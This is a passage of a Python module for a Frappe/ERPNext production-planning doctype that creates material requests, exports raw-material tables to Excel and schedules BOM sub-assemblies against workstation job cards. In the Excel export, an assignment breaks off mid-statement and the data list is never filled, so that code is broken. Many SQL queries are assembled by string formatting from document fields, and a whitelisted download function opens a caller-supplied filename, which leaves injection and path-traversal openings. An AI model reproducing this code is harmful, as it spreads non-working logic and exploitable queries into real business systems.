Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') and i.material_request != '' group by i.item\"\"\",as_dict=1,debug=1)\n\t\tplanned_data = {i.item : i.qty for i in planned_data}\n\t\treturn planned_data\n\t\t# Get planned qty from material request for which production plan not in place and work order not in 
place\n\t\t# planned_mr = frappe.db.sql(\"\"\"SELECT mri.item_code,sum(mri.qty) as qty from `tabMaterial Request` mr join `tabMaterial Request Item` mri on mri.parent = mr.name where mr.transaction_date < '{0}' and mr.transaction_date >= '{1}' and not exists(SELECT pp.name from `tabProduction Plan` pp join `tabProduction Plan Material Request` pp_item on pp_item.parent = pp.name where pp_item.material_request = mr.name) and not exists(SELECT wo.name from `tabWork Order` wo where wo.material_request = mr.name)\"\"\".format(self.to_date,self.from_date),as_dict=1)\n\t\t# # Manipulate in order to show in dict format\n\t\t# planned_data_dict = {item.item_code : item.qty for item in planned_mr if item.item_code != None and item.qty != None}\n\t\t# Get planned qty from production plan for which work order not in place\n\t\t# planned_data_dict = dict()\n\t\t# if self.to_date and self.from_date:\n\t\t# \tplanned_pp = frappe.db.sql(\"\"\"SELECT pp_item.item_code,sum(pp_item.planned_qty) as planned_qty from `tabProduction Plan` pp join `tabProduction Plan Item` pp_item on pp_item.parent = pp.name where pp.posting_date < {0} and pp.posting_date >= '{1}' and pp.docstatus = 1 and not exists(SELECT wo.name from `tabWork Order` wo where wo.production_plan = pp.name)\"\"\".format(self.to_date,self.from_date),as_dict=1)\n\t\t# else:\n\t\t# \tplanned_pp = frappe.db.sql(\"\"\"SELECT pp_item.item_code,sum(pp_item.planned_qty) as planned_qty from `tabProduction Plan` pp join `tabProduction Plan Item` pp_item on pp_item.parent = pp.name and pp.docstatus =1 and not exists(SELECT wo.name from `tabWork Order` wo where wo.production_plan = pp.name)\"\"\",as_dict=1)\n\t\t# # update planned_data_dict\n\t\t# if planned_pp:\n\t\t# \tfor row in planned_pp:\n\t\t# \t\tif row.get('item_code') in planned_data_dict:\n\t\t# \t\t\tqty = flt(planned_data_dict.get(row.get('item_code'))) + row.get('planned_qty')\n\t\t# \t\t\tplanned_data_dict.update({row.get('item_code'):qty})\n\t\t# \t\telse:\n\t\t# \t\t\tif row.item_code != None and row.planned_qty != None:\n\t\t# \t\t\t\tplanned_data_dict.update({row.get('item_code'):row.get('planned_qty')})\n\t\t# # Get planned qty from work order\n\t\t# if self.to_date and self.from_date:\n\t\t# \tplanned_wo = frappe.db.sql(\"\"\"SELECT wo.production_item,(wo.qty-wo.produced_qty) as qty from `tabWork Order` wo where wo.planned_start_date < '{0}' and wo.planned_start_date >= '{1}' and wo.docstatus=1\"\"\".format(self.to_date,self.from_date),as_dict=1)\n\t\t# else:\n\t\t# \tplanned_wo = frappe.db.sql(\"\"\"SELECT wo.production_item,(wo.qty-wo.produced_qty) as qty from `tabWork Order` wo where wo.docstatus=1\"\"\",as_dict=1)\n\t\t# # update planned_data_dict\n\t\t# if planned_wo:\n\t\t# \tfor row in planned_wo:\n\t\t# \t\tif row.get('production_item') in planned_data_dict:\n\t\t# \t\t\tqty = flt(planned_data_dict.get(row.get('production_item'))) + row.get('qty')\n\t\t# \t\t\tplanned_data_dict.update({row.get('production_item'):qty})\n\t\t# \t\telse:\n\t\t# \t\t\tif row.item_code != None and row.planned_qty != None:\n\t\t# \t\t\t\tplanned_data_dict.update({row.get('production_item'):row.get('qty')})\n\t\t# \t\t\telse:\n\t\t# \t\t\t\tplanned_data_dict = {}\n\t\t# return planned_data_dict\n\t\n\t@frappe.whitelist()\n\tdef make_material_request(self):\n\t\t\"\"\"Create Material Requests grouped by Sales Order and Material Request Type\"\"\"\n\t\tmaterial_request_list = []\n\t\tmaterial_request_map = {}\n\t\tdefault_company = frappe.db.get_single_value(\"Global Defaults\", 
\"default_company\")\n\t\tmr_doc = frappe.db.get_value(\"Material Request\",{'production_planning_with_lead_time':self.name},'name')\n\n\t\tif not mr_doc:\n\t\t\tmaterial_request_doc = frappe.new_doc(\"Material Request\")\n\t\t\tif material_request_doc:\n\t\t\t\tmaterial_request_doc.material_request_type = \"Purchase\"\n\t\t\t\tmaterial_request_doc.transaction_date = nowdate()\n\t\t\t\tmaterial_request_doc.company = default_company\n\t\t\t\tmaterial_request_doc.production_planning_with_lead_time = self.name\n\t\t\t\tfor row in self.raw_materials_table:\n\t\t\t\t\tif row.qty > 0:\n\t\t\t\t\t\titem_doc = get_item_defaults(row.item, default_company)\n\t\t\t\t\t\t# Make material requests for only stock items\n\t\t\t\t\t\tstock_item = frappe.db.get_value(\"Item\",{'name':row.item},'is_stock_item')\n\t\t\t\t\t\tif stock_item:\n\t\t\t\t\t\t\tengineering_revision = frappe.db.get_value(\"Engineering Revision\",{'item_code':row.item,'is_default':1,'is_active':1},'name')\n\t\t\t\t\t\t\tmaterial_request_doc.append(\"items\",{\n\t\t\t\t\t\t\t\t'item_code': row.item,\n\t\t\t\t\t\t\t\t'item_name': item_doc.get(\"item_name\"),\n\t\t\t\t\t\t\t\t'engineering_revision':item_doc.get(\"engineering_revision\") if item_doc.get(\"engineering_revision\") else engineering_revision,\n\t\t\t\t\t\t\t\t'rfq_required':item_doc.get('rfq_required'),\n\t\t\t\t\t\t\t\t'schedule_date':row.get('date_to_be_ready'),\n\t\t\t\t\t\t\t\t'description':item_doc.get('description'),\n\t\t\t\t\t\t\t\t'item_group':item_doc.get('item_group'),\n\t\t\t\t\t\t\t\t'qty':row.qty,\n\t\t\t\t\t\t\t\t'uom':item_doc.get(\"stock_uom\"),\n\t\t\t\t\t\t\t\t'stock_uom':item_doc.get(\"stock_uom\"),\n\t\t\t\t\t\t\t\t'warehouse':item_doc.get('item_defaults')[0].get('default_warehouse') if item_doc.get('item_defaults') else ''\n\t\t\t\t\t\t\t\t})\n\t\t\t\tmaterial_request_doc.flags.ignore_permissions = 1\n\t\t\t\tmaterial_request_doc.run_method(\"set_missing_values\")\n\t\t\t\tmaterial_request_doc.save()\n\n\t\t\t\tfrappe.flags.mute_messages = False\n\n\t\t\t\tif material_request_doc:\n\t\t\t\t\tupdate_mr_status_in_raw_materials_table(self, material_request_doc.name)\n\t\t\t\t\tmr = get_link_to_form(\"Material Request\",material_request_doc.name)\n\t\t\t\t\tmsgprint(_(\"Material Request {0} Created.\").format(mr))\n\t\t\t\telse:\n\t\t\t\t\tmsgprint(_(\"No material request created\"))\n\t\telse:\n\t\t\tupdate_mr_status_in_raw_materials_table(self, mr_doc)\n\t\t\tmr = get_link_to_form(\"Material Request\",mr_doc)\n\t\t\tmsgprint(_(\"Material Request {0} is Already Created.\").format(mr))\n\n\t@frappe.whitelist()\n\tdef download_raw_material(self):\n\t\t#Add the headers\n\t\theaders = ['Item', 'Qty', 'Original Qty', 'Date To Be Ready', 'Available Stock', 'Shortage', 'Lead Time', 'On Order Stock', 'Order in Days', 'Latest Date Availability', 'Readiness Status', 'MR Status']\n\t\tfinal_data = []\n\t\t#raw material table is empty then throw the messsage \n\t\tif not self.raw_materials_table:\n\t\t\tfrappe.throw('Raw Material Table Is Empty')\n\t\telse:\n\t\t\tfor i in self.raw_materials_table:\n\t\t\t\t#add the data\n\t\t\t\tdep_data = {}\n\t\t\t\tdep_data['Item'] = i.item\n\t\t\t\tdep_data['Qty'] = i.qty\n\t\t\t\tdep_data['Original Qty'] = i.original_qty\n\t\t\t\tdep_data['Date To Be Ready'] = i.date_to_be_ready\n\t\t\t\tdep_data['Available Stock'] = i.available_stock\n\t\t\t\tdep_data['Shortage'] = i.shortage\n\t\t\t\tdep_data['Lead Time'] = i.lead_time\n\t\t\t\tdep_data['On Order Stock'] = i.on_order_stock\n\t\t\t\tdep_data['Order in Days'] = 
\n\t\t\tif final_data:\n\t\t\t\tbook = Workbook()\n\t\t\t\tsheet = book.active\n\t\t\t\trow = 1\n\t\t\t\tcol = 1\n\t\t\t\tfor item in headers:\n\t\t\t\t\tcell = sheet.cell(row=row,column=col)\n\t\t\t\t\tcell.font = Font(bold=True, color=\"FF0000\")\n\t\t\t\t\tcell.value = item\n\t\t\t\t\tcol += 1\n\t\t\t\trow = 2\n\t\t\t\tcol = 1\n\n\t\t\t\tfor item in final_data:\n\t\t\t\t\t# write one row per raw material, columns in the same order as the headers\n\t\t\t\t\tfor offset, key in enumerate(headers):\n\t\t\t\t\t\tcell = sheet.cell(row=row,column=col + offset)\n\t\t\t\t\t\tcell.value = item[key]\n\t\t\t\t\trow += 1\n\t\t\t\tfile_path = frappe.utils.get_site_path(\"public\")\n\t\t\t\tfname = self.name + '-' + now() + \".xlsx\"\n\t\t\t\t# fname = self.name + \".xlsx\"\n\t\t\t\tbook.save(file_path + \"/\" + fname)\n\t\t\t\treturn fname\n\n\tdef validate(self):\n\t\tqty = []\n\t\tcount = 1\n\t\tif self.hide_zero_qty_item == 1 and self.raw_materials_table:\n\t\t\tfor i in self.raw_materials_table:\n\t\t\t\t# keep only rows with qty greater than zero\n\t\t\t\tif i.qty != 0:\n\t\t\t\t\ti.idx = count\n\t\t\t\t\tqty.append(deepcopy(i))\n\t\t\t\t\tcount += 1\n\t\t\tif qty:\n\t\t\t\tself.raw_materials_table.clear()\n\t\t\t\tself.raw_materials_table = qty\n\t\t\t\t# self.reload()\n\n@frappe.whitelist()\ndef download_xlsx(fname):\n\tfile_path = frappe.utils.get_site_path(\"public\")\n\t# fname = fname + '-' + now() + \".xlsx\"\n\twb = openpyxl.load_workbook(filename=file_path + \"/\" + fname)\n\txlsx_file = BytesIO()\n\twb.save(xlsx_file)\n\tfrappe.local.response.filecontent = xlsx_file.getvalue()\n\n\tfrappe.local.response.type = \"download\"\n\n\tfrappe.local.response.filename = fname\n\ndef set_default_warehouses(row, default_warehouses):\n\tfor field in [\"wip_warehouse\", \"fg_warehouse\"]:\n\t\tif not row.get(field):\n\t\t\trow[field] = default_warehouses.get(field)\n\ndef make_work_order_for_finished_goods(production_plan_doc, wo_list):\n\titems_data = get_production_items(production_plan_doc)\n\tfor key, item in items_data.items():\n\t\tif production_plan_doc.sub_assembly_items:\n\t\t\titem['use_multi_level_bom'] = 0\n\n\t\twork_order = create_work_order(production_plan_doc,item)\n\t\tif work_order:\n\t\t\two_list.append(work_order)\n@frappe.whitelist()\ndef get_raw_items(bom,raw_data,qty):\n\tdoc = 
frappe.get_doc(\"BOM\",{'name':bom})\n\tif doc:\n\t\tfor row in doc.items:\n\t\t\tstock_qty = (row.qty*qty)\n\t\t\tif not row.bom_no:\n\t\t\t\traw_data.append({\n\t\t\t\t\t'item':row.item_code,\n\t\t\t\t\t'qty':stock_qty\n\t\t\t\t})\n\t\treturn raw_data\n@frappe.whitelist()\ndef get_sub_assembly_item(bom_no, bom_data, to_produce_qty,date_to_be_ready,row_name, warehouse_list, indent=0):\n\tdata = get_children('BOM', parent = bom_no)\n\tfor d in data:\n\t\tif d.expandable:\n\t\t\toperation_time = frappe.db.sql(\"\"\"SELECT sum(time_in_mins) as operation_time from `tabBOM Operation` where parent = '{0}'\"\"\".format(d.value),as_dict=1)\n\t\t\tmakeup_days = frappe.db.get_value(\"BOM\",{'name':d.value},'makeup_days')\n\t\t\tparent_item_code = frappe.get_cached_value(\"BOM\", bom_no, \"item\")\n\t\t\tstock_qty = (d.stock_qty / d.parent_bom_qty) * flt(to_produce_qty)\n\t\t\ttotal_operation_time_in_mins = flt(operation_time[0].get('operation_time'))*stock_qty\n\t\t\ttotal_operation_time_in_days = ceil(total_operation_time_in_mins/480)\n\t\t\t# Calculate date_to_be_ready\n\t\t\tdate_to_be_ready = (date_to_be_ready-timedelta(total_operation_time_in_days)-timedelta(makeup_days))\n\t\t\tdate_dict = check_workstation_availability(date_to_be_ready,d.value,stock_qty)\n\n\t\t\t#calculate partial stock and workstation availability\n\t\t\tpartial_qty_dict=get_partial_qty(date_to_be_ready, d.item_code, warehouse_list)\n\t\t\tpartial_workstation_availability=check_partial_workstation_availability(date_to_be_ready,d.value, stock_qty)\n\t\t\tpartial_remark = \"{0}{1}\".format(partial_qty_dict.get(\"partial_remark\"), partial_workstation_availability.get(\"remark\") if partial_workstation_availability else \"\")\n\n\t\t\tbom_data.append(frappe._dict({\n\t\t\t\t'parent_item_code': parent_item_code,\n\t\t\t\t'description': d.description,\n\t\t\t\t'production_item': d.item_code,\n\t\t\t\t'item_name': d.item_name,\n\t\t\t\t'stock_uom': d.stock_uom,\n\t\t\t\t'uom': d.stock_uom,\n\t\t\t\t'bom_no': d.value,\n\t\t\t\t'is_sub_contracted_item': d.is_sub_contracted_item,\n\t\t\t\t'bom_level': indent,\n\t\t\t\t'indent': indent,\n\t\t\t\t'stock_qty': stock_qty,\n\t\t\t\t'date_to_be_ready':date_to_be_ready,\n\t\t\t\t'planned_start_date' : date_dict.get(\"planned_start_date\") if date_dict else date_to_be_ready,\n\t\t\t\t'total_operation_time':total_operation_time_in_days,\n\t\t\t\t'row_name':row_name,\n\t\t\t\t'remark':date_dict.get(\"remark\") if date_dict else \"\",\n\t\t\t\t\"partial_remark\": partial_remark\n\t\t\t}))\n\t\t\tif d.value:\n\n\t\t\t\tif date_dict:\n\t\t\t\t\tget_sub_assembly_item(d.value, bom_data, stock_qty,date_dict.get('planned_start_date'), row_name, warehouse_list, indent=indent+1)\n\t\t\t\telse:\n\t\t\t\t\tget_sub_assembly_item(d.value, bom_data, stock_qty,date_to_be_ready,row_name, warehouse_list, indent=indent+1)\ndef get_on_order_stock(self,required_date):\n\tplanned_po = frappe.db.sql(\"\"\"SELECT poi.item_code,sum(poi.qty-poi.received_qty) as qty,poi.schedule_date from `tabPurchase Order` po join `tabPurchase Order Item` poi on poi.parent = po.name where poi.schedule_date < '{0}' and qty > 0 group by poi.item_code\"\"\".format(required_date),as_dict=1,debug=0)\n\t# Manipulate in order to show in dict format\n\tif planned_po:\n\t\ton_order_stock = {item.item_code : item.qty for item in planned_po if item.item_code!=None}\n\telse:\n\t\ton_order_stock = dict()\n\tschedule_date_dict = {item.item_code : item.schedule_date for item in planned_po if item.item_code!=None}\n\tplanned_mr = 
frappe.db.sql(\"\"\"SELECT mri.item_code,sum(mri.qty) as qty ,mri.schedule_date from `tabMaterial Request` mr join `tabMaterial Request Item` mri on mri.parent = mr.name where mr.schedule_date <= '{0}' and mr.material_request_type = 'Purchase' and not exists (SELECT po.name from `tabPurchase Order` po join `tabPurchase Order Item` poi on poi.parent = po.name where poi.material_request = mr.name) and mr.docstatus = 1 and qty >0 group by mri.item_code\"\"\".format(required_date),as_dict=1)\n\tif planned_mr:\n\t\tfor row in planned_mr:\n\t\t\tif row.get('item_code') != None:\n\t\t\t\tif row.get('item_code') in on_order_stock:\n\t\t\t\t\tqty = flt(on_order_stock.get(row.get('item_code'))) + flt(row.get('qty'))\n\t\t\t\t\ton_order_stock.update({row.get('item_code'):qty})\n\t\t\t\telse:\n\t\t\t\t\ton_order_stock.update({row.get('item_code'):flt(row.get('qty'))})\n\t\t\t\tif row.get('item_code') in schedule_date_dict:\n\t\t\t\t\tif row.get('schedule_date') > schedule_date_dict.get(row.get('item_code')):\n\t\t\t\t\t\tschedule_date_dict.update({row.get('item_code'):row.schedule_date})\n\t\t\t\telse:\n\t\t\t\t\tschedule_date_dict.update({row.get('item_code'):row.schedule_date})\n\treturn on_order_stock,schedule_date_dict\n# fetch warehouse from Rushabh settings\ndef get_warehouses():\n\t# warehouse list\n\tfg_warehouse = frappe.db.sql(\"SELECT warehouse from `tabWarehouse Table`\", as_dict = 1)\n\tall_warehouses = frappe.db.sql(\"SELECT warehouse from `tabBin`\",as_dict=1)\n\tfrom_warehouses = []\n\n\tif fg_warehouse:\n\t\tfor row in fg_warehouse:\n\t\t\twarehouse_list = frappe.db.get_descendants('Warehouse', row.warehouse)\n\t\t\tif warehouse_list:\n\t\t\t\tfor item in warehouse_list:\n\t\t\t\t\tfrom_warehouses.append(item)\n\t\t\telse:\n\t\t\t\tfrom_warehouses.append(row.warehouse)\n\t\tfg_warehouse_ll = [\"'\" + row + \"'\" for row in from_warehouses]\n\t\tfg_warehouse_list = ','.join(fg_warehouse_ll)\n\telse:\n\t\tfor row in all_warehouses:\n\t\t\tfrom_warehouses.append(row.get('warehouse'))\n\t\tfg_warehouse_ll = [\"'\" + row + \"'\" for row in from_warehouses]\n\t\tfg_warehouse_list = ','.join(fg_warehouse_ll)\n\t # fg_warehouse_list = \"' '\"\n\t\n\treturn fg_warehouse_list\n\ndef get_ohs(fg_warehouse_list):\n\tcurrent_stock = frappe.db.sql(\"\"\"SELECT item_code,sum(actual_qty) as qty from `tabBin` where warehouse in ({0}) group by item_code \"\"\".format(fg_warehouse_list),as_dict=1)\n\tohs_dict = {item.item_code : item.qty for item in current_stock}\n\treturn ohs_dict\n\ndef get_allocated_ohs_fg():\n\tallocated_ohs = frappe.db.sql(\"\"\"SELECT i.item,sum(i.available_stock) as qty from `tabFG Items Table` i join `tabProduction Planning With Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') group by i.item\"\"\",as_dict=1,debug=1)\n\tallocated_ohs = {item.item : item.qty for item in allocated_ohs}\n\treturn allocated_ohs\n\ndef get_allocated_planned_stock_fg():\n\tallocated_ohs = frappe.db.sql(\"\"\"SELECT i.item,sum(i.already_planned_qty) as qty from `tabFG Items Table` i join `tabProduction Planning With Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') group by i.item\"\"\",as_dict=1,debug=1)\n\tallocated_ohs = {item.item : item.qty for item in allocated_ohs}\n\n\treturn allocated_ohs\n\n\ndef get_allocated_ohs_sfg():\n\tallocated_ohs = frappe.db.sql(\"\"\"SELECT i.item,sum(i.available_stock) as qty from `tabSub Assembly Items Table` i join `tabProduction Planning With Lead Time` pp 
on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') group by i.item\"\"\",as_dict=1,debug=1)\n\tallocated_ohs = {item.item : item.qty for item in allocated_ohs}\n\treturn allocated_ohs\n\ndef get_allocated_planned_stock_sfg():\n\tallocated_ohs = frappe.db.sql(\"\"\"SELECT i.item,sum(i.already_planned_qty) as qty from `tabSub Assembly Items Table` i join `tabProduction Planning With Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') group by i.item\"\"\",as_dict=1,debug=1)\n\tallocated_ohs = {item.item : item.qty for item in allocated_ohs}\n\n\treturn allocated_ohs\n\ndef get_allocated_ohs_raw():\n\tallocated_ohs = frappe.db.sql(\"\"\"SELECT i.item,sum(i.available_stock) as qty from `tabRaw Materials Table` i join `tabProduction Planning With Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') group by i.item\"\"\",as_dict=1,debug=1)\n\tallocated_ohs = {item.item : item.qty for item in allocated_ohs}\n\n\treturn allocated_ohs\n\ndef get_actual_ohs(ohs,allocated_ohs):\n\tif ohs and allocated_ohs:\n\t\tfor row in allocated_ohs:\n\t\t\tif row in ohs:\n\t\t\t\tqty = flt(ohs.get(row)) - flt(allocated_ohs.get(row))\n\t\t\t\tohs.update({row:qty if qty > 0 else 0})\n\treturn ohs\n\ndef get_actual_planned_fg(planned_data,allocated_planned_stock):\n\tif planned_data and allocated_planned_stock:\n\t\tfor row in planned_data:\n\t\t\t# subtract only where an allocation actually exists (mirrors get_actual_ohs)\n\t\t\tif row in allocated_planned_stock:\n\t\t\t\tqty = planned_data.get(row) - allocated_planned_stock.get(row)\n\t\t\t\tplanned_data.update({row:qty})\n\treturn planned_data\n\ndef get_sales_orders(self):\n\tso_filter = item_filter = \"\"\n\tbom_item = \"bom.item = so_item.item_code\"\n\n\tdate_field_mapper = {\n\t\t'from_date': ('>=', 'so.transaction_date'),\n\t\t'to_date': ('<=', 'so.transaction_date'),\n\t\t'from_delivery_date': ('>=', 'so_item.delivery_date'),\n\t\t'to_delivery_date': ('<=', 'so_item.delivery_date')\n\t}\n\n\tfor field, value in date_field_mapper.items():\n\t\tif self.get(field):\n\t\t\tso_filter += f\" and {value[1]} {value[0]} %({field})s\"\n\n\tfor field in ['customer']:\n\t\tif self.get(field):\n\t\t\tso_field = field\n\t\t\tso_filter += f\" and so.{so_field} = %({field})s\"\n\n\tif self.item and frappe.db.exists('Item', self.item):\n\t\tbom_item = get_bom_item(self) or bom_item\n\t\titem_code = self.item\n\t\titem_filter += \" and so_item.item_code = '%s'\" % self.item\n\n\topen_so = frappe.db.sql(f\"\"\"\n\t\tselect distinct so.name, so.transaction_date, so.customer, date(so_item.delivery_date) as delivery_date,so_item.item_code,(so_item.qty-so_item.delivered_qty) as qty,so_item.name as sales_order_item\n\t\tfrom `tabSales Order` so, `tabSales Order Item` so_item\n\t\twhere so_item.parent = so.name\n\t\t\tand so.docstatus = 1 and so.status not in (\"Stopped\", \"Closed\") and ((so_item.qty-so_item.delivered_qty)>0) {so_filter} {item_filter}\n\t\t\tand (exists (select name from `tabBOM` bom where bom.item = so_item.item_code\n\t\t\t\t\tand bom.is_active = 1)\n\t\t\t\tor exists (select name from `tabPacked Item` pi\n\t\t\t\t\twhere pi.parent = so.name and pi.parent_item = so_item.item_code\n\t\t\t\t\t\tand exists (select name from `tabBOM` bom where bom.item=pi.item_code\n\t\t\t\t\t\t\tand bom.is_active = 1)))\n\t\t\"\"\", self.as_dict(), as_dict=1)\n\n\topen_sales_orders = [so.name for so in open_so]\n\n\topen_sales_orders = \"', '\".join(open_sales_orders)\n\n\tcheck_previous_planning = frappe.db.sql(\"\"\"SELECT\n\t
sot.sales_order from `tabSales Order Table` sot join `tabProduction Planning With Lead Time` pp on pp.name = sot.parent where pp.docstatus in (0,1) and sot.sales_order in ('{0}') \"\"\".format(open_sales_orders),as_dict=1)\n\n\tcheck_previous_planning = [sot.sales_order for sot in check_previous_planning]\n\tfinal_so_list = []\n\tif check_previous_planning:\n\t\tfor row in open_so:\n\t\t\tif row.name in check_previous_planning:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tfinal_so_list.append(row)\n\t\treturn final_so_list\n\telse:\n\t\treturn open_so\ndef get_open_mr(self):\n\tmr_filter = item_filter = \"\"\n\tbom_item = \"bom.item = mr_item.item_code\"\n\n\tdate_field_mapper = {\n\t\t'from_date': ('>=', 'mr.transaction_date'),\n\t\t'to_date': ('<=', 'mr.transaction_date'),\n\t\t'from_delivery_date': ('>=', 'mr_item.schedule_date'),\n\t\t'to_delivery_date': ('<=', 'mr_item.schedule_date')\n\t}\n\n\tfor field, value in date_field_mapper.items():\n\t\tif self.get(field):\n\t\t\tmr_filter += f\" and {value[1]} {value[0]} %({field})s\"\n\n\t# for field in ['customer']:\n\t# \tif self.get(field):\n\t# \t\tso_field = field\n\t# \t\tso_filter += f\" and so.{so_field} = %({field})s\"\n\n\tif self.item and frappe.db.exists('Item', self.item):\n\t\tbom_item = get_bom_item(self) or bom_item\n\t\titem_filter += \" and mr_item.item_code = '%s'\" % self.item\n\n\topen_mr = frappe.db.sql(f\"\"\"\n\t\tselect distinct mr.name, mr.transaction_date,date(mr_item.schedule_date) as delivery_date,mr_item.item_code,(mr_item.qty-mr_item.ordered_qty) as qty ,mr_item.name as material_request_item\n\t\tfrom `tabMaterial Request` mr, `tabMaterial Request Item` mr_item\n\t\twhere mr_item.parent = mr.name\n\t\t\tand mr.docstatus = 1 and mr.status not in (\"Stopped\", \"Cancelled\") and mr.material_request_type = \"Manufacture\" and ((mr_item.qty-mr_item.ordered_qty)>0) {mr_filter} {item_filter}\n\t\t\tand (exists (select name from `tabBOM` bom where {bom_item}\n\t\t\t\t\tand bom.is_active = 1)\n\t\t\t\t)\n\t\t\"\"\", self.as_dict(), as_dict=1)\n\topen_material_request = [mr.name for mr in open_mr]\n\n\topen_material_request = \"', '\".join(open_material_request)\n\n\tcheck_previous_planning = frappe.db.sql(\"\"\"SELECT sot.material_request from `tabSales Order Table` sot join `tabProduction Planning With Lead Time` pp on pp.name = sot.parent where pp.docstatus in (0,1) and sot.material_request in ('{0}') \"\"\".format(open_material_request),as_dict=1)\n\n\tcheck_previous_planning = [sot.material_request for sot in check_previous_planning]\n\tfinal_mr_list = []\n\tif check_previous_planning:\n\t\tfor row in open_mr:\n\t\t\tif row.name in check_previous_planning:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tfinal_mr_list.append(row)\n\t\treturn final_mr_list\n\telse:\n\t\treturn open_mr\ndef get_bom_item(self):\n\t\"\"\"Check if Item or if its Template has a BOM.\"\"\"\n\tbom_item = None\n\thas_bom = frappe.db.exists({'doctype': 'BOM', 'item': self.item, 'docstatus': 1})\n\tif not has_bom:\n\t\ttemplate_item = frappe.db.get_value('Item', self.item, ['variant_of'])\n\t\tbom_item = \"bom.item = {0}\".format(frappe.db.escape(template_item)) if template_item else bom_item\n\treturn bom_item\n\ndef get_overlap_for(self, args, check_next_available_slot=False):\n\t\tproduction_capacity = 1\n\n\t\tif self.workstation:\n\t\t\tproduction_capacity = (\n\t\t\t\tfrappe.get_cached_value(\"Workstation\", self.workstation, \"production_capacity\") or 1\n\t\t\t)\n\t\t\tvalidate_overlap_for = \" and jc.workstation = %(workstation)s \"\n\n\t\tif 
args.get(\"employee\"):\n\t\t\t# override capacity for employee\n\t\t\tproduction_capacity = 1\n\t\t\tvalidate_overlap_for = \" and jctl.employee = %(employee)s \"\n\n\t\textra_cond = \"\"\n\t\tif check_next_available_slot:\n\t\t\textra_cond = \" or (%(from_time)s <= jctl.from_time and %(to_time)s <= jctl.to_time)\"\n\n\t\texisting = frappe.db.sql(\n\t\t\t\"\"\"select jc.name as name, jctl.to_time from\n\t\t\t`tabJob Card Time Log` jctl, `tabJob Card` jc where jctl.parent = jc.name and\n\t\t\t(\n\t\t\t\t(%(from_time)s > jctl.from_time and %(from_time)s < jctl.to_time) or\n\t\t\t\t(%(to_time)s > jctl.from_time and %(to_time)s < jctl.to_time) or\n\t\t\t\t(%(from_time)s <= jctl.from_time and %(to_time)s >= jctl.to_time) {0}\n\t\t\t)\n\t\t\tand jctl.name != %(name)s and jc.name != %(parent)s and jc.docstatus < 2 {1}\n\t\t\torder by jctl.to_time desc limit 1\"\"\".format(\n\t\t\t\textra_cond, validate_overlap_for\n\t\t\t),\n\t\t\t{\n\t\t\t\t\"from_time\": args.from_time,\n\t\t\t\t\"to_time\": args.to_time,\n\t\t\t\t\"name\": args.name or \"No Name\",\n\t\t\t\t\"parent\": args.parent or \"No Name\",\n\t\t\t\t\"employee\": args.get(\"employee\"),\n\t\t\t\t\"workstation\": self.workstation,\n\t\t\t},\n\t\t\tas_dict=True,\n\t\t)\n\n\t\tif existing and production_capacity > len(existing):\n\t\t\treturn\n\n\t\treturn existing[0] if existing else None\ndef check_workstation_availability(date_to_be_ready,bom,qty):\n\tbom_doc = frappe.get_doc(\"BOM\",bom)\n\tdate_dict = dict()\n\tif bom_doc.with_operations:\n\t\ttime_dict = dict()\n\t\tfor row in bom_doc.operations:\n\t\t\ttime_in_mins = flt(row.time_in_mins*qty)\n\t\t\ttime_in_days = (time_in_mins/480)\n\t\t\tif row.idx == 1:\n\t\t\t\t# first operation at planned_start date\n\t\t\t\tplanned_start_time = date_to_be_ready\n\t\t\t\ttime_dict.update({'planned_start_time':planned_start_time})\n\t\t\telse:\n\t\t\t\tplanned_start_time = (\n\t\t\t\t\tget_datetime(time_dict.get('planned_end_time')) \n\t\t\t\t)\n\t\t\t\t# + get_mins_between_operations()\n\t\t\tplanned_end_time = get_datetime(planned_start_time) + timedelta(time_in_days)\n\t\t\ttime_dict.update({'planned_end_time':planned_end_time})\n\t\t\tjc_data = frappe.db.sql(\"\"\"SELECT jc.name,jc.workstation,date(jc_time.from_time) as from_date from `tabJob Card` jc join `tabJob Card Time Log` jc_time on jc_time.parent = jc.name where jc.workstation = '{0}' and jc.status in ('Open','Work In Progress','Material Transferred','Submitted') and date(jc_time.from_time) between '{1}' and '{2}' and date(jc_time.to_time) between '{1}' and '{2}'\"\"\".format(row.workstation,planned_start_time,planned_end_time),as_dict=1)\n\t\t\tif jc_data == []:\n\t\t\t\tif date_dict.get('planned_start_date'):\n\t\t\t\t\tif date_dict.get('planned_start_date') < date_to_be_ready:\n\t\t\t\t\t\tdate_dict.update({'planned_start_date':date_to_be_ready,'remark':\"All Workstations are available on time\"})\n\t\t\t\telse:\n\t\t\t\t\tdate_dict.update({'planned_start_date':date_to_be_ready,'remark':\"All Workstations are available on time\"})\n\t\t\telse:\n\t\t\t\tjc_data = frappe.db.sql(\"\"\"SELECT jc.name,jc.workstation,date(jc_time.to_time) as to_time from `tabJob Card` jc join `tabJob Card Time Log` jc_time on jc_time.parent = jc.name where jc.workstation = '{0}' and jc.status in ('Open','Work In Progress','Material Transferred','Submitted') and date(jc_time.from_time) > '{1}' order by to_time desc\"\"\".format(row.workstation,planned_start_time),as_dict=1)\n\t\t\t\tplanned_end_time=get_datetime(jc_data[0].get('to_time'))\n\t\t\t\t# 
